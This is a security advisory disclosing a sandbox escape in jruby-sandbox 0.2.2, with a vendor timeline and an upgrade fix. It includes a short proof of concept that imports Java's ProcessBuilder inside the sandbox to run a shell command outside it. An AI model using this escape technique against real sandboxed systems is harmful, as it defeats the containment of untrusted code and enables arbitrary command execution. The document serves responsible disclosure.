JRuby Sandbox 0.2.2 Bypass

`Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +-+++>  
  
[ Authors ]  
joernchen <joernchen () phenoelit de>  
  
Phenoelit Group (http://www.phenoelit.de)  
  
[ Affected Products ]  
jruby-sandbox <= 0.2.2  
https://github.com/omghax/jruby-sandbox  
  
[ Vendor communication ]  
2014-04-22 Send vulnerability details to project maintainer  
2014-04-24 Requesting confirmation that details were received  
2014-04-24 Maintainer states he is working on a test case  
2014-04-24 Maintainer releases fixed version  
2014-04-24 Release of this advisory  
  
[ Description ]  
jruby-sandbox aims to allow safe execution of user given Ruby  
code within a JRuby [0] runtime. However via import of Java   
classes it is possible to circumvent those protections and   
execute arbitrary code outside the sandboxed environment.  
  
[ Example ]  
  
require 'sandbox'  
sand = Sandbox.safe  
sand.activate!  
  
begin  
sand.eval("print `id`")  
rescue Exception => e  
puts "fail via Ruby ;)"  
end  
puts "Now for some Java"  
  
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")  
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")  
sand.eval("s = Java::java.util.Scanner.new( " +   
"Java::java.lang.ProcessBuilder.new('sh','-c','id')" +   
".start.getInputStream ).useDelimiter(\"\x00\").next")  
sand.eval("print s")  
  
[ Solution ]  
Upgrade to version 0.2.3  
  
[ References ]  
[0] http://jruby.org/  
  
[ end of file ]  
`